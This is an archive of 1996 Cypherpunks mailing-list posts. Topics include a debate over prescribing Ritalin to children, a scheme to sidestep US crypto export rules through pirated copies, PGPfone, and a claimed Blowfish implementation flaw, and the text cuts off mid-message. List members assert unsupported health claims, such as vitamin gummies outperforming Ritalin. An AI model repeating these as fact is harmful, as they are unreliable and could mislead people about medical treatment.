In-Reply-To: <199607090509.BAA11381@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960710232627.329A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Perry E. Metzger wrote:
> I'm sick of you, Tim and other people telling folks how to treat
> their problems. Tim is happy saying that he thinks people's lives are
> their own business, but opportunities to stick his nose into the ways
> that his neighbors raise children are just peachy to him.

     Maybe we're just a bit afraid of how society treats it's members,
and how parents treat our future employees/servants/neighbors. 

     We are not trying to pass laws that say people _can't_ give their 
kids drugs, just questioning the wisdom of passing the pills out like
they are candy to children. They same children we tell not to smoke a 
little pot because "we don't know how it affects young minds".

     Speed is a little more potent than Pot. Just a little.

> If someone out there has their life improved by Ritalin, its not any
> of your business to tell them not to take it.

     If someones life is being ruined because their parents are forcing 
them to take these pills. 


> There are kids out there, and adults, who have psychological problems
> that are well treated if not cured by medicines. Sure, its nice to do
> things "naturally" and "without drugs", but I'll point out that two
> thirds or more of the people reading this message would be dead now
> because of infections they forgot they had twenty years ago, or
> because of indoor plumbing assuring a clean water supply, or a million
> other artificial interventions into the natural course of life, which
> is, naturally, death at 20 or 25 without a tooth left in your head,
> cowering in a cave, surrounded by the other savages.

     No arguements here. I'd be the last to say "Do things Naturally", 
but chemical addictions suck really hard. 

> So, go right ahead. Discourage people from using their medicines. Make
> fun of the parents of the "poor little zombie" taking Ritalin because
> otherwise his life, from his own perspective, is a living hell. Heck,

     To a Heroin Addict, life without junk is living hell.

> TAKE AWAY HIS MEDICINE, the way Tim cheers on. Then please go home and
> throw away that aspirin. The natural way to deal with a headache is to
> suffer. When you break your arm, swear off medical attention and crawl
> around in pain for a while. Its the "Right Thing" to do.
> 
> In any case, even if all this stuff isn't real, I'm sure you are
> completely above taking drugs to help you get along in life. I'm sure
> you never drink coffee to get you up in the morning, for
> instance. Because if you have, you are a hypocrite. Not, of course,
> that anyone here would fit that description.

     Quit taking Caffine 2 years ago, and quit smoking 2 weeks ago. 
     Hell, since I quit working for one of the big 6 accounting firms, I 
rarely have headaches, so you could say that leaving the High Tech Hi-Rise
life Style _did_ cure me to an extent. (that was a joke boy). 
     I really don't think that anyone here is claiming that there are no 
mental problems, just that maybe it is best not to throw powerful drugs 
at people we don't even trust to drive a car. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 11 Jul 1996 18:08:21 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Put Uncle Sam in your Calling Circle
Message-ID: <2.2.32.19960711064754.00ef9a34@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 7/11/96 -0500, snow wrote:

>> Thanks again to RSA for a couple of cool posters!
>
>      So, how does one aquire a copy of these? 

I recieved mine by sending an e-mail message to sales@rsa.com politely
asking for one.

Hopefully they still have some left.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 11 Jul 1996 17:30:37 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090604.CAA11704@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.93.960710234518.329C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Perry E. Metzger wrote:
> likelyhood that something is a disease doesn't really wash very
> well. By your lights, then, heart disease couldn't be a "real" illness
> given that a lot more than 10% of the population suffers from it to
> one extent or another. Of course, we could simply redefine dying of a
> heart attack as "normal" and then we could be done.

     A heart attack is (or used to be) a normal way of dying.

     Dying is natural. It is even (in some cases, and from certain 
perspectives) desirable. 

     So are dreamers, so are doers. Poets, Priests and Garbage collectors.
The problem is that in this society parents don't want (largely, painting 
with a BIG BIG brush and painting over some people) dreamers or garbage 
collectors, poets or artists. They want CPA's and Programmers, attentive
little students, of course the kids nature has nothing to do with it.

     Remember a year or so an add for Joop Jeans? A "Yuppie" looking woman
with a baby on a leash (like a dog collar and leash) with the words
"A child, the ultimate pet". That seems to be the position that many parents 
seem to be taking these days. They don't have kids, they have prize 
pedegree Children. These children are expected to behave without training, to
follow rules without being disiplined (funny how that word keeps popping up
in these posts) and to perform in the 90th percentile in everything. 
 
      On the other end we have growing pool of warm bodies whose parents are 
just barely warm bodies. They aren't taking prozac and ritilan to get thru
school, with them it is coke, crack, pot, horse and alcohol. Their parents 
are barely even aware of their existance. 

     IMO both of these are from the same mentality, the attitude of a child 
as a cute little pet. 

> How about giving people with hypertension blood pressure medication? I
> mean, they are just "out of the norm", right? I mean, there is a
> continuum of blood presures, yes? Why should we give the people at the
> top of the spectrum medications, just because high blood pressures are
> associated with vascular accidents?

     What causes this hypertension? Maybe rather than medicating you  
should eliminate the CAUSE of the problem.

     Of course that is more work than just taking a pill. 

> I suppose you don't understand what it might be like for someone to be
> unable to do their work no matter how heavy the threat against them if
> they don't, and no matter how easy it is. There are people out there
> who can't get themselves to pay a phone bill or throw out the
> newspapers for months on end -- they just can't get themselves to

     Actually, I would. 

> You miss the point. You spoke of involuntarily medicated kids. Most of
> the kids aren't involuntarily medicated.

     I would worry more about a kid who _wants_ speed than one who doesn't. 

     Correct me if I am wrong, but aren't children more sensative to 
chemicals than adults?

> > The price of giving the patient (or the patient's parents)
> > everything they want is [...] classrooms full of obedient
> > citizen-units in Soma-induced trances.
> Ritalin does not induce a zombie-like trance, as the numerous people
> on this mailing list who take it can tell you.

     No, the responces indicated that it turned you into a person happy 
to focus on and perform repitive tasks hour after hour. Machine-like 
trance instead of Zombie. Great. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 11 Jul 1996 17:31:31 +0800
To: Rick Smith <smith@sctc.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <v01540b00ae0826916ccd@[172.17.1.61]>
Message-ID: <Pine.LNX.3.93.960711002819.329E-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Rick Smith wrote:
> At 8:01 PM 7/8/96, John F. Fricker wrote:
> >Seems like if your child needs drugs to go to school than perhaps school is
> >the problem not that your child's body lacks Ritalin.
> I tend to agree, but it doesn't make the problem any easier to solve.
> Another alternative to Ritalin would simply be to let him struggle with
> school. It worked for me, I guess.
  
     Maybe that is one of things that school is supposed to prepare us for.
A life of struggle and beating our heads against wall after wall. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 11 Jul 1996 17:34:59 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Put Uncle Sam in your Calling Circle
In-Reply-To: <2.2.32.19960709165403.00e1349c@mail.teleport.com>
Message-ID: <Pine.LNX.3.93.960711003800.329F-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Alan Olsen wrote:
> At 11:15 AM 7/9/96 -0400, you wrote:
> >Hey guys,

                <stuff about posters snipped> 

> The posters are done by Tom Tommorow, who also does a cartoon called "This
> Modern World" which appears far too infrequently in a number of papers and
> _Processed World_.  Incredible political cynicysm...
> 
> Thanks again to RSA for a couple of cool posters!

      So, how does one aquire a copy of these? 



Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 11 Jul 1996 09:36:06 +0800
To: Martin Minow <cypherpunks@toad.com
Subject: Re: Minitel "saved" by hackers?
Message-ID: <1.5.4.32.19960711023104.002d60f8@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 08:10 10/07/96 -0700, Martin Minow wrote:
>Arun Mehta describes the "hijacking" of Minitel (where users changed
>a videotex system into two-way communication medium) as a "hacking"
>(in the computer breakin sense).
>
>I think it might be more accurate to call this a "redirection" -- the
>people using Minitel "manifest[ing] tastes often opposed to those foreseen
>by experts"

True, but as I understand it, there was also a hacking involved: they took
the original software, modified it (what I would also call hacking) and made
it freely available: that is what made the messageries possible. If I'm
using the technical terminology wrong, thanks for the correction.

I'd love to find out exactly what happened.

>Perhaps this is just another example of the cypherpunks manifesto:
>"information wants to be free."

More than that, we do!
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://mahavir.doe.ernet.in/~pinaward/arun.htm
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Thu, 11 Jul 1996 15:36:41 +0800
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Can the inevitability of Software privacy be used to defeat the ITAR?
Message-ID: <31e46fa0.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

All software companies who sell (really licence) software
must deal with the inevitability of software piracy. It
is a brute fact that any usefully product sold in the U.S.
will eventually appear as an unauthorized copy for sale
abroad. This fact must be recognized in the software companies'
business plan.

The question occurs to me "why can not this fact be used to
defeat the ITAR?"

What is to prevent a U.S company to licence a foreign company
to sublicence and distribute a Crypto product abroad, if that
foreign company obtains that product on the pirate market?

I am not a lawyer, but I look at the definition of "export"
on page 612 of Applied Cryptography and nothing seems to
obviously apply.

The scenario I imagine is this: U.S. company produces a crypto
product. To be generally useful, the product supports all languages.
(Those CDROMs really do hold a lot of data.)
After all, Americans do need to do business with foreigners.
The company licences and distributes the product in the U.S.
taking special care not to distribute the product to any foreign persons.
When inevitability, the product appears in the pirate market outside
the U.S., the company makes a contract with a foreign company 
allowing it to distribute it and sublicence it. The foreign company 
can get their copy from the pirate market, being authorized to get 
the copy by the U.S. company. When this deal is cut copies
have already been exported and are already being sold by the
pirates, against the will of the U.S. company.

In this scenario, the U.S. company had done everything
it possibly could to prevent the illegal export of its product. But
when its efforts have inevitably failed, it makes money by 
sublicencing.

When I look at the definition of Export on page 612 of applied
cryptography, I see one clause that defines transferring registration
as export, but only for aircraft, vessels and satellites.

OK, cypherpunk legal types, there has got to be something wrong
with this idea. There are a lot of smart people in the world,
so if this idea was good, somebody else would have thought of
it before now! But what is specifically is wrong with it?
I want to be educated!

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMeR9nvBUQYbUhJh5AQGkYAP/bN0lmkjF6uZ92MmWIqdZwVmLmsiIUg9L
XbtYaeawNCMdi2BnkDUu4j/G1rNngFuAmRwABE9UxKOnwjMU5lfmxHev5RP9/CBF
81AnYc1bWeh52EuKJCKu47LMDn9PqfiCIGBwfRehgkZ72gO0+ywIP1fZrkwNNCF+
Md76LqUE5Z4=
=k7M5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Shantz <bshantz@nwlink.com>
Date: Fri, 12 Jul 1996 05:45:50 +0800
To: tcmay@got.net
Subject: It's more than "White Punks on Dope"
Message-ID: <199607111437.HAA18788@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May Wrote:

> In recent decades, do-gooders have taken upon themselves to intervene
> in the parenting process and have essentially succeeded in making such
> sanctions harder for parents to impose. Schools routinely teach young
> children to inform on their parents if they have been spanked, touched,
> talked to "inappropriately," etc. Check out the parent's rights
> newsgroups (and father's rights) for tales of interrogations by agents of 
> Child Protective Services, who are empowered to remove a child 
> immediately and without court proceedings if they merely _suspect_ a 
> child has been treated in ways the State has deemed no longer 
>appropriate. 

...yadda yadda yadda...more on how we all agree that burning children is 
not a viable option....etc.

It is so much more than what the "State" deems appropriate.  Having grown 
up with both parents being teachers in the public school system and my wife 
a teacher in a private Montessori school system, I've seen that the feeling 
in society is, "Everyone is a victim."

In seattle a few years ago, there was a teenager who killed his girlfriend. 
(beat her face in with a rock)  Yes, he was caught, yes he went to trial.  
This 19 year old lame-o used this as his defense, "Fetal Alcohol Syndrome." 
  THEY LET THE MURDERER GO ON THE PRECEDENT IT WAS HIS MOTHER'S FAULT 
BECAUSE SHE HAD A FEW DRINKS WHILE SHE WAS PREGNANT WITH HIM.  So, he 
wasn't in control of his own actions?   I say bullshit to that.

At my wife's school the kids are being taught that the definition of 
harassment is if someone is doing something to you that you don't like.   
Oh, the third graders have a heyday with this one.  "Chris is looking at me 
and I don't like it."   Immediately, Chris is repremanded because he is 
harassing the other kid. What's wrong with this picture?  Well, it's not 
Chris' problem, is it?  The teachers need to be a little more understanding 
of what harassment is.  Chris could turn around and say, "By reprimanding 
me, you are harassing me for something totally stupid."  

There are so many different "syndromes" and "conditions" that you can't 
keep track of them all.  ADD, Hyperactivity, Fetal Alchohol Syndrome, 
Chronic Fatigue, Repetitive Stress (which is a physical ailment, but it 
came to mind), they are all names to psychological conditions.  Some 
because they are serious problems...like ADD in some children, but not all. 
 Some however are lame attempts by psychologists to put the human psyche 
into a bunch of prepackaged little boxes.  Eventually, you could build the 
perfect beast by just grabbing a handfull of syndromes from this box over 
here, mixing them with a few neuroses from this box over here.  Pour in a 
little Free Love, a little Self Preservation and give the entity a 
stopwatch in the shape of a heart and a scroll for a brain and you've got 
an average human being.

Sorry, no, thank you.

We are more a part of our environment than that.  Some people grow up to be 
just like their parents.  Some grow up to be the exact opposite.  However, 
our "raising" does have an effect on us.  
  
> So, what to do with children who are otherwise uncontrollable?
> 
> Ah, the State has the answer. And its name begins with "R." 'Nuff said.

At my wife's school, they do not use Ritalin.  They have started using a 
product called PhytoBears.   Don't laugh.  These are GummiBears made out of 
all natural vegetable extracts.   One of those, "100% of all the vitamins 
and minerals needed by the human body and mind in a day" kind of things.  
Apparently, the kids who were on Ritalin are now getting on much better 
with PhytoBears than they were with Ritalin.

>>     I will admit to the possibility of ADD being a "disease", but I
>>  think that the number of children who really have the disease is small
>>  compared to the number of childern recieving drugs for it.

Yes, I've read this entire thread, I don't need loads of flame mail telling 
me to go back and read the ENTIRE THREAD again.  I just want to say that in 
many schools, at least in Washington, ADD is no longer being treated 
strictly with drugs.   Someone mentioned being put in a "special" class 
while his brother was in a regular class (or the other way around).  That 
is more common than an automatic prescription for Ritalin.   I still claim 
that ADD is a syndrome that is serious in some kids and for others it's a 
crutch.  The diagnoses in Washington are getting better.

> This is the point I have been making. Not that ADD (aka ADHD,
> hyperactivity, etc.) does not sometimes exist, but that giving Ritalin
> and suchlike drugs to children has been a panacea for fidgeting, 
> wandering attention, boredom, "cutting up" in class, class clowns, 
> and so on. 

Dr. Cynthia Tobias (who just happens to be from Seattle Pacific University, 
just a coincidence) has done studies for her entire doctoral carreer on the 
subject of learning patterns.  Her findings are interesting.  They aren't 
practical in a public school system, but interesting nonetheless.  There 
are a number of different learning styles.  I won't go into all of them for 
the sake of brevity (I know, too late.)  One of the learnign styles that 
she has spent much time working on is the Kinetic/Kinesthetic learner.   
These are the kids who wander around, and fidget as Tim put it.  The goal 
of the teacher with a Kinetic learner is not to get them to sit down, but 
to get them to not distract others.  If the kid likes to do his work laying 
on the floor and he's not bothering anyone, let him.  There are some people 
(like me) who can't stand to sit at a desk all day long.  I get my work 
done, but I often lay on the floor, sit on the desk, walk around the 
office, etc.  Anyway, my point is that there are teaching practices that 
could be used to teach the child without resorting to labelling (as I think 
ADD is sometimes used) or drugs.

> And perhaps worse, _parents_, such as the example I provided, are using
> it to control children. Where once they would've paddled the kid for 
> using obscene language, or refusing to get dressed for school, now they 
> pop a pill in the child's mouth.

That is only in the example you provided, Tim.  Yes, if one person is doing 
it, there are probably more.  (It's like Cockaroaches....where there's 
one...)

> I didn't have ADD. I was simply bored by a system that either taught 
> me stuff that was irrelevant 
> 
> I suspect this was true of 90% or more of us on this list...we're a
> bright lot, and it's hard to imagine that _any_ school could keep us from
> being bored a lot of the time. (And hard classes can be boring, too.)

Agreed.  The teachers at my High School and even at Oregon State University 
always had trouble convincing me of the validity of some of the topics we 
were learning.  I'm sure it bugged them when I asked.
 
Brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elliot Lee <sopwith@redhat.com>
Date: Fri, 12 Jul 1996 01:35:59 +0800
To: caal@hopf.dnai.com
Subject: Re: Information
In-Reply-To: <199607110432.VAA05249@hopf.dnai.com>
Message-ID: <Pine.LNX.3.93.960711085658.17998F-100000@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Jul 1996 caal@hopf.dnai.com wrote:

> Dear Cypherpunks:
> 
> I'm new here and without taking too much bandwidth, I'd like to ask you for
> some assistance.  I am wondering if there is a precise way of figuring out
> where a web/mail server is based, or at least get some identifying
> information.  I think I saw some messages on this list a few weeks ago about
> how easy it is to identify a server or ISP, with just an address (web or
> e-mail address).  Is this possible and how?

Put your brain and the 'whois' command together. Marvelous things can
happen. ;-)

\\\| Elliot Lee                |\\\    ||  "Claim to fame":
 \\\| Red Hat Software          |\\\   ||  Live in only town in the
  \\\| Webmaster www.redhat.com, |\\\  ||  USA with an unlisted ZIP
   \\\| Programmer, etc.          |\\\ ||  code.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 12 Jul 1996 08:47:12 +0800
To: Jerome Tan <cypherpunks@toad.com>
Subject: Re: Metered Phone
Message-ID: <ae0ae73a030210043c6e@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:19 PM 7/6/96, Jerome Tan wrote:
>Does anyone have any ideas about this metered phone? I am from Philippines
>and heard some news that it will be existing in 1997. Quite a big problem!
>Every dial will be counted, every seconds will be measured...

Better that the phone count calls (as in the Netherlands) than record the
number called (as in the United States).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 12 Jul 1996 09:41:19 +0800
To: cypherpunks-announce@toad.com
Subject: JULY BAY AREA MEETING
Message-ID: <2.2.32.19960711170452.0087ec64@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

We will be hosting a Cypherpunk meeting this Saturday the
13th.  Late notice, but better late than never.  Be prepared
to bring up your own topics, but I propose we spend some 
time discussion the meta-question of list dynamics.  Is the
Cypherpunks list a "sewer"?  Is there anything we can do to
improve signal-to-noise?  Do we need to?  Etc.

The meeting location will be at the Flatiron building in
San Francisco, aka 544 Market, aka 1 Sutter.  The building
sits on Market and Sutter at Sansome and near 2nd.  It is
right above the eastern end of the Montgomery BART station.
We will try to have someone in the lobby to let you in the
1 Sutter entrance, but if no one is there, call the office
so someone can come down (415-392-0526).  We will be in
the offices of Simple Access on the 5th floor.  The time
is noon to 6:00 or so.


 S a n d y

P.S.1.  We may have a surprise visitor.
P.S.2.  If you don't know about Cypherpunk Thai brunch
        on Sundays, ask me.  This Sunday, we are going
        shooting after we eat.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Fri, 12 Jul 1996 10:02:38 +0800
To: cypherpunks@toad.com
Subject: Re: "White 'Punks on Dope" (w apologies to The Tubes)
Message-ID: <199607111723.KAA29657@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 10, 10:12pm, Timothy C. May wrote:
> And perhaps worse, _parents_, such as the example I provided, are using it
[Ritalin]
> to control children. Where once they would've paddled the kid for using
> obscene language, or refusing to get dressed for school, now they pop a
> pill in the child's mouth.

There are certainly legitimate arguments about the level of use of
Ritalin or other drugs, their benefits & their costs, but this straw
man is just ridiculous, & betrays the author's lack of knowledge.
Unfortunately a similar misunderstanding is reflected in the writings
of 1 or 2 others on this topic too.

Parental (or other) control is not at issue at all with add; self
control is the main problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Jul 1996 11:02:04 +0800
To: Paul Elliott <cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Can the inevitability of Software privacy be used to defeat the ITAR?
Message-ID: <199607111740.KAA19755@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:06 AM 7/11/96 +0000, Paul Elliott wrote:

>What is to prevent a U.S company to licence a foreign company
>to sublicence and distribute a Crypto product abroad, if that
>foreign company obtains that product on the pirate market?
>
>I am not a lawyer, but I look at the definition of "export"
>on page 612 of Applied Cryptography and nothing seems to
>obviously apply.
>
>The scenario I imagine is this: U.S. company produces a crypto
>product. To be generally useful, the product supports all languages.
>(Those CDROMs really do hold a lot of data.)
>After all, Americans do need to do business with foreigners.
>The company licences and distributes the product in the U.S.
>taking special care not to distribute the product to any foreign persons.
>When inevitability, the product appears in the pirate market outside
>the U.S., the company makes a contract with a foreign company 
>allowing it to distribute it and sublicence it. The foreign company 
>can get their copy from the pirate market, being authorized to get 
>the copy by the U.S. company. When this deal is cut copies
>have already been exported and are already being sold by the
>pirates, against the will of the U.S. company.

I raised this type of idea on CP, twice, and didn't hear a peep about it!  
(As recently as a couple of days ago.)  It doesn't entirely eliminate the 
illegality; it merely transfers that illegality to an unknown and thus 
unprosecutable person.  But yes, it appears that nothing would prevent this 
technique from working very well.

Any attempted prosecution would fare even less well than the example of 
Zimmermann and PGP 1.0:  There would be no illusion that an encryption 
product sold in hundreds of stores nationwide could be kept within the 
borders of the US, so the domestic manufacturer is safe.  The foreign 
distributor isn't violating any of his own country's laws, and probably not 
arguably any of the US.  Both companies could enthusiastically invite the 
USG to prosecute whoever actually exported the software, laughing all the 
way to the bank.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Jul 1996 11:39:09 +0800
To: cypherpunks@toad.com
Subject: Irony on strong encryption in Australia
Message-ID: <199607111950.MAA28899@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The Australian Broadcasting Authority's report on Internet regulation issues
recommends that ISPs be required to support unescrowed strong encryption for
their users' privacy and security.

Electronic Frontiers Australia is opposed to this idea because it puts too
much of a burden on the ISP.

http://www.efa.org.au/

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 12 Jul 1996 09:46:08 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: rsync and md4
In-Reply-To: <199607110013.RAA07968@netcom17.netcom.com>
Message-ID: <199607111657.MAA02031@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
>  > From cypherpunks-errors@toad.com  Wed Jul 10 14:43:28 1996
>  > Subject: Re: rsync and md4
>  > Date: Mon, 01 Jul 1996 10:19:27 -0400
> 
> I think I've seen this message before.  Perry must be in reruns
> for the summer.
> 
> Stay tuned for more of "The Best of Perry." :)

Some host out there is reposting cypherpunks mail. I haven't tracked
it down yet.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 12 Jul 1996 09:54:10 +0800
To: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Can the inevitability of Software privacy be used to defeat the ITAR?
In-Reply-To: <31e46fa0.flight@flight.hrnowl.lonestar.org>
Message-ID: <Pine.LNX.3.94.960711125842.153B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 11 Jul 1996, Paul Elliott wrote:

> All software companies who sell (really licence) software
> must deal with the inevitability of software piracy. It
> is a brute fact that any usefully product sold in the U.S.
> will eventually appear as an unauthorized copy for sale
> abroad. This fact must be recognized in the software companies'
> business plan.
> 
> The question occurs to me "why can not this fact be used to
> defeat the ITAR?"
> 
> What is to prevent a U.S company to licence a foreign company
> to sublicence and distribute a Crypto product abroad, if that
> foreign company obtains that product on the pirate market?

Just because the company didn't break any laws doesn't mean that they aren't
going to be harassed by the government.  This is similar to the Philip
Zimmermann case.  A grand jury investigation could be carried on for as long
as the statute of limitations dictates and then the prosecutor of the case
decided at the last minute not to indict.  This is the reason that Netscape
has not yet made a browser with 128-bit encryption available on the Internet.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeUz3bZc+sv5siulAQE8HwQAmBdr9ELdZk8s8GQ9rTKhYrp43KcOiCGJ
Xn0FeTxdliWzWzwB3YoqW0HD8MGZnRFxmuW8l8bnHvQrbVIZxq40USPJnbFwhDXO
2bQciufQyJ+NitAyyl7ZuoqhIzwfht8D7rP9ov7C7di2f07XAOM8gTGYhdu9ja4P
wVvG7nRr3vg=
=iN90
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 12 Jul 1996 11:46:04 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <199607112037.NAA29245@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please post the correct syntax to remove unwanted keys from
the secret ring (if there is a way)?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 11 Jul 1996 23:32:51 +0800
To: Will Price <wprice@primenet.com>
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
In-Reply-To: <v03007602ae0a51a2c9bf@[206.16.90.42]>
Message-ID: <31E4E92A.62FFD016@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Will Price wrote:
> 
> ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
> _______________________________________________________
> 
> MIT has released Philip Zimmermann's PGPfone 1.0b7 for Macintosh and
> 1.0b2 for Windows95 or NT.  This new secure telephone product is now
> available for download at the MIT PGP distribution web site:

Can anyone tell me if the specs available for the PGPfone protocol?
Is there an implementation available, with source?

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kip DeGraaf <kip@monroe.lib.mi.us>
Date: Fri, 12 Jul 1996 11:40:38 +0800
To: cypherpunks@toad.com
Subject: Green Paper on PICS from ALA
Message-ID: <2.2.32.19960711192405.014093b4@monroe.lib.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone still have a copy of the Green Paper on PICS usage in a library
setting by Magpantay that was yanked from the ALA web site?

I would be interested in reading a copy of it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Fri, 12 Jul 1996 05:54:28 +0800
To: wprice@primenet.com
Subject: Re: ANNOUNCEMENT: PGPfone Beta 7 Now Available for Download
Message-ID: <3257270267.87025315@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Will Price writes:

> PGPfone uses Diffie-Hellman public-key technology to provide encryption
> keys for the user's selection of CAST, TripleDES, or Blowfish
> encryption algorithms

Does the Blowfish implementation address the weakness described
below?

--Jeff

------------------------

Warning:  Blowfish can be cracked.  (I apologize for
the sensationalism.  I also apologize if this has
been mentioned before.  This needs your attention.)
 
I have found a way to crack 80 bytes of ciphertext 
encrypted with the blowfish algorithm (ECB mode), 
25% of the time.   Blowfish, as printed in "Applied  
Cryptography, Second Edition", and as corrected in 
Bruce Schneier's Errata Sheet, using a randomly 
generated 64 bit key, can be cracked in much less 
than 10 minutes on a Pentium 120MHz (10 minutes is 
worst case).  According to my calculations, with 
optimizations, I could cut this down to about 5 
seconds to 2.5 minutes worst case.
 
Previously, I wrote:
>...
>I have come up with several sets of vectors, 
>{k1,k2,pl,pr,cl,cr} such that when you use 
>k1 or k2 to encrypt pl and pr you will always 
>get cl, and cr, where k1={b10,b11,b1...,b1n}, 
>where b1i is the ith byte in the key k1, and 
>where n is divisible by 4.
>... 
> 
> 
>Mike Morgan
 
I investigated this further, and it turned out
to be a source code implementation error.
 
There is an implementation error in published
Blowfish Code. The program chokes on the 
commented  "choke" statement, below:
 
bfinit(char *key,int keybytes)
{
